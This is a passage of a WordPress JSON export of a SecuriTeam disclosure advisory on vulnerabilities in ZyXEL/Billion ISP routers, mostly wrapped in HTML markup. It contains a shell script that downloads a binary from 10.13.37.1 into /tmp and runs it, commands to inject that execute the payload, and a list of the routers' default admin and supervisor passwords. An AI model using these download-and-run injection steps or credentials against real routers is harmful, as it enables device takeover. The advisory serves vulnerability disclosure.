\/tmp\/b  \/tmp\/b<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825274102328914-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825274102328914-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825274102328914-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825274102328914-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825274102328914-1\"><span class=\"crayon-p\">#!\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825274102328914-2\"><span class=\"crayon-v\">wget<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">O<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/10.13.37.1\/b<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825274102328914-3\"><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825274102328914-4\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>Then inject the following commands:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825276954208676\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> chmod +x \/tmp\/a  \/tmp\/a<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825276954208676-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825276954208676-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825276954208676-1\"><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825276954208676-2\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Default accounts &#8211; P660HN-T v2 router<\/strong><\/p>\n<ol>\n<li>username: admin; password: password<\/li>\n<li>username: true; password: true<\/li>\n<li>username: supervisor; password: zyad1234<\/li>\n<\/ol>\n<p><strong>Vendor Response<\/strong><br \/> We notified ZyXEL of the vulnerabilities back in July 2016, repeated attempts to re-establish contact and get some answer on the status of the patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.<\/p>\n<p>Editing: In January 2017, ZyXEL contact us and correct us that they are not the manufacturer of Billion routers.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2910\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following advisory describes four (4) vulnerabilities and default accounts \/ passwords in ZyXEL \/ Billion customized routers. TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge. The routers are manufactured by ZyXEL and Billion runs a special Linux distribution called &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2910\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; ZyXEL \/ Billion Multiple Vulnerabilities<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6273","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6273"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6273\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6273"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}